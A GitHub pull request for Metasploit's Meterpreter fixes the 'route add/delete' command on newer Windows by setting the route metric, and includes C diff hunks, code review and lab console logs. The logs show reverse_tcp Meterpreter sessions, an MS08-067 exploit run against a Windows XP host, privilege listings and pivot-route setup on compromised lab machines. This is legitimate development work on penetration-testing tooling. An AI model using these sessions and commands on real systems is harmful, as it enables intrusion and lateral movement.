### PR TITLE
Set the metric so routes can be added and deleted

### LINKED ISSUE #613: route command is not working
```
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.0.0.22:4444 
[*] Sending stage (200774 bytes) to 10.0.0.3
[*] Meterpreter session 28 opened (10.0.0.22:4444 -> 10.0.0.3:49688) at 2023-02-24 11:32:43 -0500

meterpreter > sysinfo
Computer        : DESKTOP-4CQE3PS
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  7
============
Name         : Intel(R) 82574L Gigabit Network Connection #2
Hardware MAC : 00:0c:29:91:47:6f
MTU          : 1500
IPv4 Address : 10.0.0.3
IPv4 Netmask : 255.0.0.0
IPv6 Address : fe80::c412:df9c:9717:fffd
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 14
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:91:47:65
MTU          : 1500
IPv4 Address : 192.168.1.67
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::f8cc:2ab8:1786:3238
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > route add 192.168.1.66 255.255.255.0 192.168.1.1
Creating route 192.168.1.66/255.255.255.0 -> 192.168.1.1
[-] stdapi_net_config_add_route: Operation failed: One or more arguments are not correct.
meterpreter > route add 192.168.1.66 255.255.255.0 0.0.0.0
Creating route 192.168.1.66/255.255.255.0 -> 0.0.0.0
[-] stdapi_net_config_add_route: Operation failed: One or more arguments are not correct.
meterpreter > route add 192.168.1.1/32 255.255.255.0 0.0.0.0
Creating route 192.168.1.1/32/255.255.255.0 -> 0.0.0.0
[-] stdapi_net_config_add_route: Operation failed: One or more arguments are not correct.
meterpreter > route add 10.0.0.0/8 255.0.0.0 0.0.0.0
[-] Invalid IP Address
meterpreter > route add 10.0.0.0 255.0.0.0 0.0.0.0
Creating route 10.0.0.0/255.0.0.0 -> 0.0.0.0
[-] stdapi_net_config_add_route: Operation failed: One or more arguments are not correct.
meterpreter > route add 10.0.0.1/16 255.0.0.0 0.0.0.0
[-] Invalid IP Address
meterpreter > route add 10.0.0.1/16 255.0.0.0 1
[-] Invalid IP Address
meterpreter > route add 10.0.0.1/16 255.0.0.0 0.0.0.0
[-] Invalid IP Address
meterpreter > route add 10.0.0.1/8 255.0.0.0 0.0.0.0
[-] Invalid IP Address
meterpreter > route add 192.168.1.1/32 255.255.255.0 0.0.0.0
Creating route 192.168.1.1/32/255.255.255.0 -> 0.0.0.0
[-] stdapi_net_config_add_route: Operation failed: One or more arguments are not correct.
meterpreter > route add 192.168.1.1-192.168.255.255 255.255.255.0 0.0.0.0
[-] Invalid IP Address
meterpreter > route add 192.168.1.1/32 255.255.255.0 0.0.0.0
Creating route 192.168.1.1/32/255.255.255.0 -> 0.0.0.0
[-] stdapi_net_config_add_route: Operation failed: One or more arguments are not correct.
meterpreter > route add 192.168.1.1/24 255.255.255.0 0.0.0.0
[-] Invalid IP Address
```

### PR DESCRIPTION
**Pull request by zeroSteiner**
Fixes #613. Without specifying the route metric, `CreateIpForwardEntry` fails with "One or more arguments are not correct." Assuming this used to work, this must be a requirement for newer versions of Windows. To obtain the default value, [per the docs:](https://learn.microsoft.com/en-us/windows/win32/api/iphlpapi/nf-iphlpapi-createipforwardentry). Also added a bunch of debug output that helped to track down the original issue.

> If an application would like to set the route metric to 0, then the dwForwardMetric1 member of the MIB_IPFORWARDROW structure should be set equal to the value of the interface metric specified in the Metric member of the associated MIB_IPINTERFACE_ROW structure. An application can retrieve the interface metric by calling the [GetIpInterfaceEntry](https://learn.microsoft.com/en-us/windows/desktop/api/netioapi/nf-netioapi-getipinterfaceentry) function.

[`GetIpInterfaceEntry`](https://learn.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-getipinterfaceentry) was added in Windows Vista so it's looked up using `GetProcAddress`. If the function isn't available, the metric stays at 0 but when it is, the interfaces metric is used which fixes the error on Windows Server 2019.

Since the user can't control the value of the metric, and adding that would be outside the scope of fixing the original issue<sup>1</sup> I also tested that a route can be deleted when the metric value does not match. This would be the case if theOS  command line was used to add a metric, and then the Meterpreter command was used to remove it. This worked just fine in my testing and can be seen towards the bottom of the demo below.

<sup>1</sup> Adding this with as an optional parameter wouldn't be too bad but [Mettle should be updated as well](https://github.com/rapid7/mettle/blob/e219b515a2967b8522d7831ae75d1d263fb94373/mettle/src/stdapi/net/config.c#L155-L205) to keep the functionality parallel. Then to expose it, Metasploit Framework would need to be updated too.

## Testing
- [x] Add a route using the Windows Meterpreter's `route` command and see that it works
- [x] See the newly added route in the output of the `route` command
- [x] Delete the route using the Windows Meterpreter's `route` command and see that it works

## Demo

```
meterpreter > sysinfo
gComputer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
eLogged On Users : 13
tMeterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway         Metric  Interface
    ------           -------          -------         ------  ---------
    0.0.0.0          0.0.0.0          192.168.159.2   281     14
    127.0.0.0        255.0.0.0        127.0.0.1       331     1
    127.0.0.1        255.255.255.255  127.0.0.1       331     1
    127.255.255.255  255.255.255.255  127.0.0.1       331     1
    192.168.159.0    255.255.255.0    192.168.159.10  281     14
    192.168.159.10   255.255.255.255  192.168.159.10  281     14
    192.168.159.255  255.255.255.255  192.168.159.10  281     14
    224.0.0.0        240.0.0.0        127.0.0.1       331     1
    224.0.0.0        240.0.0.0        192.168.159.10  281     14
    255.255.255.255  255.255.255.255  127.0.0.1       331     1
    255.255.255.255  255.255.255.255  192.168.159.10  281     14


IPv6 network routes
===================

    Subnet                     Netmask                                  Gateway  Metric  Interface
    ------                     -------                                  -------  ------  ---------
    ::1                        ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     1
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     14
    fe80::cc05:79df:8a0f:b84f  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     14
    ff00::                     ff00::                                   ::       331     1
    ff00::                     ff00::                                   ::       331     14
meterpreter > route add 10.10.10.0 255.255.255.0 192.168.159.128
Creating route 10.10.10.0/255.255.255.0 -> 192.168.159.128
meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway          Metric  Interface
    ------           -------          -------          ------  ---------
    0.0.0.0          0.0.0.0          192.168.159.2    281     14
    10.10.10.0       255.255.255.0    192.168.159.128  25      14
    127.0.0.0        255.0.0.0        127.0.0.1        331     1
    127.0.0.1        255.255.255.255  127.0.0.1        331     1
    127.255.255.255  255.255.255.255  127.0.0.1        331     1
    192.168.159.0    255.255.255.0    192.168.159.10   281     14
    192.168.159.10   255.255.255.255  192.168.159.10   281     14
    192.168.159.255  255.255.255.255  192.168.159.10   281     14
    224.0.0.0        240.0.0.0        127.0.0.1        331     1
    224.0.0.0        240.0.0.0        192.168.159.10   281     14
    255.255.255.255  255.255.255.255  127.0.0.1        331     1
    255.255.255.255  255.255.255.255  192.168.159.10   281     14


IPv6 network routes
===================

    Subnet                     Netmask                                  Gateway  Metric  Interface
    ------                     -------                                  -------  ------  ---------
    ::1                        ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     1
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     14
    fe80::cc05:79df:8a0f:b84f  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     14
    ff00::                     ff00::                                   ::       331     1
    ff00::                     ff00::                                   ::       331     14
meterpreter > route delete 10.10.10.0 255.255.255.0 192.168.159.128
Deleting route 10.10.10.0/255.255.255.0 -> 192.168.159.128
meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway         Metric  Interface
    ------           -------          -------         ------  ---------
    0.0.0.0          0.0.0.0          192.168.159.2   281     14
    127.0.0.0        255.0.0.0        127.0.0.1       331     1
    127.0.0.1        255.255.255.255  127.0.0.1       331     1
    127.255.255.255  255.255.255.255  127.0.0.1       331     1
    192.168.159.0    255.255.255.0    192.168.159.10  281     14
    192.168.159.10   255.255.255.255  192.168.159.10  281     14
    192.168.159.255  255.255.255.255  192.168.159.10  281     14
    224.0.0.0        240.0.0.0        127.0.0.1       331     1
    224.0.0.0        240.0.0.0        192.168.159.10  281     14
    255.255.255.255  255.255.255.255  127.0.0.1       331     1
    255.255.255.255  255.255.255.255  192.168.159.10  281     14


IPv6 network routes
===================

    Subnet                     Netmask                                  Gateway  Metric  Interface
    ------                     -------                                  -------  ------  ---------
    ::1                        ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     1
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     14
    fe80::cc05:79df:8a0f:b84f  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     14
    ff00::                     ff00::                                   ::       331     1
    ff00::                     ff00::                                   ::       331     14
meterpreter > shell
Process 6444 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>route add 10.10.10.0 mask 255.255.255.0 192.168.159.128 metric 77 if 14
route add 10.10.10.0 mask 255.255.255.0 192.168.159.128 metric 77 if 14
 OK!

C:\Windows\system32>exit
exit
meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway          Metric  Interface
    ------           -------          -------          ------  ---------
    0.0.0.0          0.0.0.0          192.168.159.2    281     14
    10.10.10.0       255.255.255.0    192.168.159.128  102     14
    127.0.0.0        255.0.0.0        127.0.0.1        331     1
    127.0.0.1        255.255.255.255  127.0.0.1        331     1
    127.255.255.255  255.255.255.255  127.0.0.1        331     1
    192.168.159.0    255.255.255.0    192.168.159.10   281     14
    192.168.159.10   255.255.255.255  192.168.159.10   281     14
    192.168.159.255  255.255.255.255  192.168.159.10   281     14
    224.0.0.0        240.0.0.0        127.0.0.1        331     1
    224.0.0.0        240.0.0.0        192.168.159.10   281     14
    255.255.255.255  255.255.255.255  127.0.0.1        331     1
    255.255.255.255  255.255.255.255  192.168.159.10   281     14


IPv6 network routes
===================

    Subnet                     Netmask                                  Gateway  Metric  Interface
    ------                     -------                                  -------  ------  ---------
    ::1                        ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     1
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     14
    fe80::cc05:79df:8a0f:b84f  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     14
    ff00::                     ff00::                                   ::       331     1
    ff00::                     ff00::                                   ::       331     14
meterpreter > route delete 10.10.10.0 255.255.255.0 192.168.159.128
Deleting route 10.10.10.0/255.255.255.0 -> 192.168.159.128
meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway         Metric  Interface
    ------           -------          -------         ------  ---------
    0.0.0.0          0.0.0.0          192.168.159.2   281     14
    127.0.0.0        255.0.0.0        127.0.0.1       331     1
    127.0.0.1        255.255.255.255  127.0.0.1       331     1
    127.255.255.255  255.255.255.255  127.0.0.1       331     1
    192.168.159.0    255.255.255.0    192.168.159.10  281     14
    192.168.159.10   255.255.255.255  192.168.159.10  281     14
    192.168.159.255  255.255.255.255  192.168.159.10  281     14
    224.0.0.0        240.0.0.0        127.0.0.1       331     1
    224.0.0.0        240.0.0.0        192.168.159.10  281     14
    255.255.255.255  255.255.255.255  127.0.0.1       331     1
    255.255.255.255  255.255.255.255  192.168.159.10  281     14


IPv6 network routes
===================

    Subnet                     Netmask                                  Gateway  Metric  Interface
    ------                     -------                                  -------  ------  ---------
    ::1                        ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     1
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     14
    fe80::cc05:79df:8a0f:b84f  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     14
    ff00::                     ff00::                                   ::       331     1
    ff00::                     ff00::                                   ::       331     14
meterpreter > 
```

### CODE REVIEW

File: c/meterpreter/source/extensions/stdapi/server/net/config/route.c [hunk 1]
```diff
@@ -229,26 +233,49 @@ DWORD add_remove_route(Packet *packet, BOOLEAN add)
 	route.dwForwardDest    = inet_addr(subnet);
 	route.dwForwardMask    = inet_addr(netmask);
 	route.dwForwardNextHop = inet_addr(gateway);
-	route.dwForwardType    = 4; // Assume next hop.
-	route.dwForwardProto   = 3;
+	route.dwForwardType    = MIB_IPROUTE_TYPE_INDIRECT; // Assume next hop.
+	route.dwForwardProto   = MIB_IPPROTO_NETMGMT;
 	route.dwForwardAge     = -1;
+	route.dwForwardMetric1 = 0;
```
Comment (gwillcox-r7) [inline c/meterpreter/source/extensions/stdapi/server/net/config/route.c:239]: Should this not be `-1` if this is not being used? According to https://learn.microsoft.com/en-us/windows/win32/api/ipmib/ns-ipmib-mib_ipforwardrow that is the case?

File: c/meterpreter/source/extensions/stdapi/server/net/config/route.c [hunk 2]
```diff
@@ -229,26 +233,49 @@ DWORD add_remove_route(Packet *packet, BOOLEAN add)
...
+	if (dwResult != ERROR_SUCCESS) {
+		dprintf("[NET] add_remove_route: GetBestInterface failed. error=%d (0x%x)", dwResult, (ULONG_PTR)dwResult);
+		return dwResult;
+	}
+	dprintf("[NET] add_remove_route: GetBestInterface returned ifIndex=%d.", route.dwForwardIfIndex);
+
+	pGetIpInterfaceEntry = (GETIPINTERFACEENTRY)GetProcAddress(GetModuleHandle(TEXT("iphlpapi")), "GetIpInterfaceEntry");
+	// If GetIpInterfaceEntry is available, use it to set the default metric because newer systems require that
+	if (pGetIpInterfaceEntry) {
+		MIB_IPINTERFACE_ROW iface = { .Family = AF_INET, .InterfaceIndex = route.dwForwardIfIndex };
```
Comment (gwillcox-r7) [inline c/meterpreter/source/extensions/stdapi/server/net/config/route.c:257]: Curious but why the dot before these attributes? Those don't seem to be part of the name. Also should we not be zeroing out the memory of this structure before assigning values? Otherwise we are relying on the compiler doing this or stuff to not be used.

File: c/meterpreter/source/extensions/stdapi/server/net/config/route.c [hunk 3]
```diff
@@ -229,26 +233,49 @@ DWORD add_remove_route(Packet *packet, BOOLEAN add)
...
+		dwResult = pGetIpInterfaceEntry(&iface);
+		if (dwResult == NO_ERROR) {
+			route.dwForwardMetric1 = iface.Metric;
+		}
+		else {
+			dprintf("[NET] add_remove_route: GetIpInterfaceEntry failed. error=%d (0x%x)", dwResult, (ULONG_PTR)dwResult);
```
Comment (gwillcox-r7) [inline c/meterpreter/source/extensions/stdapi/server/net/config/route.c:263]: Question but isn't this going to fall through to trying to add the entry anyway using either `CreateIpForwardEntry` or similar despite it failing on `GetIpInterfaceEntry`? Seems a bit off to me. Also seems to be a repeated pattern here.

File: c/meterpreter/source/extensions/stdapi/server/net/config/route.c (hunk 1 above)
Comment (gwillcox-r7) [reply c/meterpreter/source/extensions/stdapi/server/net/config/route.c:239]: Yep np happy to keep in as is 👍

File: c/meterpreter/source/extensions/stdapi/server/net/config/route.c (hunk 2 above)
Comment (zeroSteiner) [reply c/meterpreter/source/extensions/stdapi/server/net/config/route.c:257]: > Curious but why the dot before these attributes? Those don't seem to be part of the name.

They are names in the [MIB_IPINTERFACE_ROW](https://learn.microsoft.com/en-us/windows/win32/api/netioapi/ns-netioapi-mib_ipinterface_row) definition. If you remove the leading dot the compiler breaks throwing the following error:

image

> Also should we not be zeroing out the memory of this structure before assigning values? Otherwise we are relying on the compiler doing this or stuff to not be used.

We covered this [in the last PR.](https://github.com/rapid7/metasploit-payloads/pull/599#discussion_r1070091489) Per the C-99 spec, a partial definition such as this will cause the other fields to be initialized to zero. It's dependent on the compiler I guess, but in the sense that the compiler needs to conform to the spec.

File: c/meterpreter/source/extensions/stdapi/server/net/config/route.c (hunk 3 above)
Comment (zeroSteiner) [reply c/meterpreter/source/extensions/stdapi/server/net/config/route.c:263]: That's intentional. `GetIpInterfaceEntry` was added in Vista and `route add` works on XP SP 2. On older systems, it's not necessary to set the metric, so if we can't get it from the interface, it seems reasonable to me to try it anyways. Since we're getting the interface index from Windows in the same function call, I'm not sure it's even realistic that it wouldn't exist here.

<details>
<summary>Windows XP SP2 Demo</summary>

```
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.16:445 - Automatically detecting the target...
[*] 192.168.159.16:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.16:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.16:445 - Attempting to trigger the vulnerability...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x86.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] Sending stage (186438 bytes) to 192.168.159.16
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x86.dll is being used
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.16:1037) at 2023-03-03 14:30:21 -0500

meterpreter > sysinfo
Computer        : SMCINTYR-7D7507
OS              : Windows XP (5.1 Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway         Metric  Interface
    ------           -------          -------         ------  ---------
    0.0.0.0          0.0.0.0          192.168.159.2   10      2
    127.0.0.0        255.0.0.0        127.0.0.1       1       1
    192.168.159.0    255.255.255.0    192.168.159.16  10      2
    192.168.159.16   255.255.255.255  127.0.0.1       10      1
    192.168.159.255  255.255.255.255  192.168.159.16  10      2
    224.0.0.0        240.0.0.0        192.168.159.16  10      2
    255.255.255.255  255.255.255.255  192.168.159.16  1       65540
    255.255.255.255  255.255.255.255  192.168.159.16  1       2

No IPv6 routes were found.
meterpreter > route add 10.10.10.0 255.255.255.0 192.168.159.128
Creating route 10.10.10.0/255.255.255.0 -> 192.168.159.128
meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway          Metric  Interface
    ------           -------          -------          ------  ---------
    0.0.0.0          0.0.0.0          192.168.159.2    10      2
    10.10.10.0       255.255.255.0    192.168.159.128  10      2
    127.0.0.0        255.0.0.0        127.0.0.1        1       1
    192.168.159.0    255.255.255.0    192.168.159.16   10      2
    192.168.159.16   255.255.255.255  127.0.0.1        10      1
    192.168.159.255  255.255.255.255  192.168.159.16   10      2
    224.0.0.0        240.0.0.0        192.168.159.16   10      2
    255.255.255.255  255.255.255.255  192.168.159.16   1       65540
    255.255.255.255  255.255.255.255  192.168.159.16   1       2

No IPv6 routes were found.
meterpreter > 
```
</details>

File: c/meterpreter/source/extensions/stdapi/server/net/config/route.c (hunk 2 above)
Comment (gwillcox-r7) [reply c/meterpreter/source/extensions/stdapi/server/net/config/route.c:257]: My apologies on the second point; technically speaking its a little bit of a shakey way of doing things but since we are only compiling with one compiler (VS) on one specific spec, this shouldn't be an issue if the spec defines that it should be initialized. Thanks for clarifying this.

As for the other point, appreciate you sharing that, makes sense.

Based on this I'm going to mark this comment as resolved.

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
Still experiencing some issues with this on my end:

```
meterpreter > route

IPv4 network routes
===================

    Subnet           Netmask          Gateway          Metric  Interface
    ------           -------          -------          ------  ---------
    0.0.0.0          0.0.0.0          192.168.153.2    25      5
    127.0.0.0        255.0.0.0        127.0.0.1        331     1
    127.0.0.1        255.255.255.255  127.0.0.1        331     1
    127.255.255.255  255.255.255.255  127.0.0.1        331     1
    192.168.116.0    255.255.255.0    192.168.116.128  281     11
    192.168.116.128  255.255.255.255  192.168.116.128  281     11
    192.168.116.255  255.255.255.255  192.168.116.128  281     11
    192.168.153.0    255.255.255.0    192.168.153.153  281     5
    192.168.153.153  255.255.255.255  192.168.153.153  281     5
    192.168.153.255  255.255.255.255  192.168.153.153  281     5
    224.0.0.0        240.0.0.0        127.0.0.1        331     1
    224.0.0.0        240.0.0.0        192.168.153.153  281     5
    224.0.0.0        240.0.0.0        192.168.116.128  281     11
    255.255.255.255  255.255.255.255  127.0.0.1        331     1
    255.255.255.255  255.255.255.255  192.168.153.153  281     5
    255.255.255.255  255.255.255.255  192.168.116.128  281     11


IPv6 network routes
===================

    Subnet                     Netmask                                  Gateway  Metric  Interface
    ------                     -------                                  -------  ------  ---------
    ::1                        ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     1
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     5
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     11
    fe80::5692:c3ad:621c:25d1  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     11
    fe80::7db2:381a:15e0:1a01  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     5
    ff00::                     ff00::                                   ::       331     1
    ff00::                     ff00::                                   ::       331     5
    ff00::                     ff00::                                   ::       331     11
meterpreter > route add 192.168.116.129 255.255.255.0 192.168.153.0
Creating route 192.168.116.129/255.255.255.0 -> 192.168.153.0
[-] stdapi_net_config_add_route: Operation failed: The parameter is incorrect.
meterpreter > route add 192.168.116.128 255.255.255.0 192.168.153.0
Creating route 192.168.116.128/255.255.255.0 -> 192.168.153.0
[-] stdapi_net_config_add_route: Operation failed: The parameter is incorrect.
meterpreter > route add 192.168.116.128 255.255.255.0 192.168.153.153
Creating route 192.168.116.128/255.255.255.0 -> 192.168.153.153
[-] stdapi_net_config_add_route: Operation failed: The parameter is incorrect.
meterpreter > sysinfo
Computer        : WINDOWS-11-TEST
OS              : Windows 10 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: Windows-11-Test\test
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeDelegateSessionUserImpersonatePrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > 
```

**Comment by zeroSteiner** [comment]
Try `route add 192.168.100.0 255.255.255.0 192.168.153.1`. You're trying to add a route to a network you're directly attached to which may be a problem, but more likely the issue is that 192.168.153.0 is not a valid gateway IP address on the network.

If that still doesn't work, check if you can define that route using the OS's `route` add command like `route add 192.168.116.129 mask 255.255.255.0 192.168.153.0`. If the OS doesn't accept it, then it's unlikely that Meterpreter will.

**Comment by gwillcox-r7** [comment]
Alright `route add 192.168.100.0 255.255.255.0 192.168.153.1` worked fine, thanks for the assistance on that!

**Comment by gwillcox-r7** [comment]
Seems to be working now:

```
msf6 payload(windows/x64/meterpreter/bind_tcp) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer        : WINDOWS-11-TEST
OS              : Windows 10 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface  5
============
Name         : Intel(R) 82574L Gigabit Network Connection
Hardware MAC : 00:0c:29:a0:da:e4
MTU          : 1500
IPv4 Address : 192.168.153.153
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::7db2:381a:15e0:1a01
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 11
============
Name         : Intel(R) 82574L Gigabit Network Connection #2
Hardware MAC : 00:0c:29:a0:da:ee
MTU          : 1500
IPv4 Address : 192.168.116.128
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::5692:c3ad:621c:25d1
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > route add 192.168.100.0 255.255.255.0 192.168.153.1
Creating route 192.168.100.0/255.255.255.0 -> 192.168.153.1
meterpreter > route list

IPv4 network routes
===================

    Subnet           Netmask          Gateway          Metric  Interface
    ------           -------          -------          ------  ---------
    0.0.0.0          0.0.0.0          192.168.153.2    25      5
    127.0.0.0        255.0.0.0        127.0.0.1        331     1
    127.0.0.1        255.255.255.255  127.0.0.1        331     1
    127.255.255.255  255.255.255.255  127.0.0.1        331     1
    192.168.100.0    255.255.255.0    192.168.153.1    25      5
    192.168.116.0    255.255.255.0    192.168.116.128  281     11
    192.168.116.128  255.255.255.255  192.168.116.128  281     11
    192.168.116.255  255.255.255.255  192.168.116.128  281     11
    192.168.153.0    255.255.255.0    192.168.153.153  281     5
    192.168.153.153  255.255.255.255  192.168.153.153  281     5
    192.168.153.255  255.255.255.255  192.168.153.153  281     5
    224.0.0.0        240.0.0.0        127.0.0.1        331     1
    224.0.0.0        240.0.0.0        192.168.153.153  281     5
    224.0.0.0        240.0.0.0        192.168.116.128  281     11
    255.255.255.255  255.255.255.255  127.0.0.1        331     1
    255.255.255.255  255.255.255.255  192.168.153.153  281     5
    255.255.255.255  255.255.255.255  192.168.116.128  281     11


IPv6 network routes
===================

    Subnet                     Netmask                                  Gateway  Metric  Interface
    ------                     -------                                  -------  ------  ---------
    ::1                        ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     1
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     5
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     11
    fe80::5692:c3ad:621c:25d1  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     11
    fe80::7db2:381a:15e0:1a01  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     5
    ff00::                     ff00::                                   ::       331     1
    ff00::                     ff00::                                   ::       331     5
    ff00::                     ff00::                                   ::       331     11
meterpreter > route delete 192.168.100.0 255.255.255.0 192.168.153.1
Deleting route 192.168.100.0/255.255.255.0 -> 192.168.153.1
meterpreter > route list

IPv4 network routes
===================

    Subnet           Netmask          Gateway          Metric  Interface
    ------           -------          -------          ------  ---------
    0.0.0.0          0.0.0.0          192.168.153.2    25      5
    127.0.0.0        255.0.0.0        127.0.0.1        331     1
    127.0.0.1        255.255.255.255  127.0.0.1        331     1
    127.255.255.255  255.255.255.255  127.0.0.1        331     1
    192.168.116.0    255.255.255.0    192.168.116.128  281     11
    192.168.116.128  255.255.255.255  192.168.116.128  281     11
    192.168.116.255  255.255.255.255  192.168.116.128  281     11
    192.168.153.0    255.255.255.0    192.168.153.153  281     5
    192.168.153.153  255.255.255.255  192.168.153.153  281     5
    192.168.153.255  255.255.255.255  192.168.153.153  281     5
    224.0.0.0        240.0.0.0        127.0.0.1        331     1
    224.0.0.0        240.0.0.0        192.168.153.153  281     5
    224.0.0.0        240.0.0.0        192.168.116.128  281     11
    255.255.255.255  255.255.255.255  127.0.0.1        331     1
    255.255.255.255  255.255.255.255  192.168.153.153  281     5
    255.255.255.255  255.255.255.255  192.168.116.128  281     11


IPv6 network routes
===================

    Subnet                     Netmask                                  Gateway  Metric  Interface
    ------                     -------                                  -------  ------  ---------
    ::1                        ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     1
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     5
    fe80::                     ffff:ffff:ffff:ffff:ffff:ffff::          ::       331     11
    fe80::5692:c3ad:621c:25d1  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     11
    fe80::7db2:381a:15e0:1a01  ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff  ::       331     5
    ff00::                     ff00::                                   ::       331     1
    ff00::                     ff00::                                   ::       331     5
    ff00::                     ff00::                                   ::       331     11
meterpreter >
```
